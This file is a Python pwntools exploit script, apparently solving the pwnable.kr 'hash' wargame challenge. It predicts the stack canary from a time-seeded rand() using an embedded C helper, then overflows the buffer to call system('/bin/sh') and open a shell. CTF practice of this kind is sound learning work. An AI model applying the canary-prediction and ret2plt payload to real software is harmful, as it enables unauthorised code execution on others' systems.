#!/usr/bin/env python
# coding: utf-8

import os
import re
import time
import random
import urllib2

from pwn import *

elf = ELF('./hash')

plt_system = elf.plt['system']

# Local EXP
t = int(time.time())
p = process('./hash')

# Remote EXP
# date = urllib2.urlopen('http://pwnable.kr').headers['Date']
# t = int(time.mktime(time.strptime(date, '%a, %d %b %Y  %H:%M:%S %Z')))
# t += random.randint(0, 3)
# p = remote('127.0.0.1', 9002)

# Get capcha value with regex
capcha = re.search(r'(-?[\d]+)', p.recvline_regex(r'(-?[\d]{5,})')).group(0)
p.sendline(capcha)

# Use hashc to calc canary value
# canary value equal to [canary = c - nums[1] - nums[5] - nums[2] + nums[3] - nums[7] - nums[4] + nums[6];]
# hashc.c
##include <stdio.h>
##include <stdlib.h>
#
#int main(int argc, char* argv[]) {
#    int t = atoi(argv[1]);
#    int c = atoi(argv[2]);
#    int canary = 0;
#    int nums[8];
#
#    srand(t);
#    int i = 0;
#    for(;i <= 7; i++) {
#        nums[i] = rand();
#    }
#    // c = nums[1] + nums[5] + nums[2] - nums[3] + nums[7] + canary + nums[4] - nums[6]
#    canary = c - nums[1] - nums[5] - nums[2] + nums[3] - nums[7] - nums[4] + nums[6];
#    printf("%x\n", canary);
#
#    return 0;
#}
canary = '0x' + os.popen('./hashc {} {}'.format(str(t), capcha)).read()
canary = int(canary, 16)

# Input string is in .bss [0x0804B0E0], write "/bin/sh" padding to the input buffer string
payload = 'A' * 512 + p32(canary) + 'A' * 12 + p32(plt_system) + p32(0x8048a00) + p32(0x0804B0E0 + 540*4/3)

p.sendline(b64e(payload) + '/bin/sh\0')
p.interactive()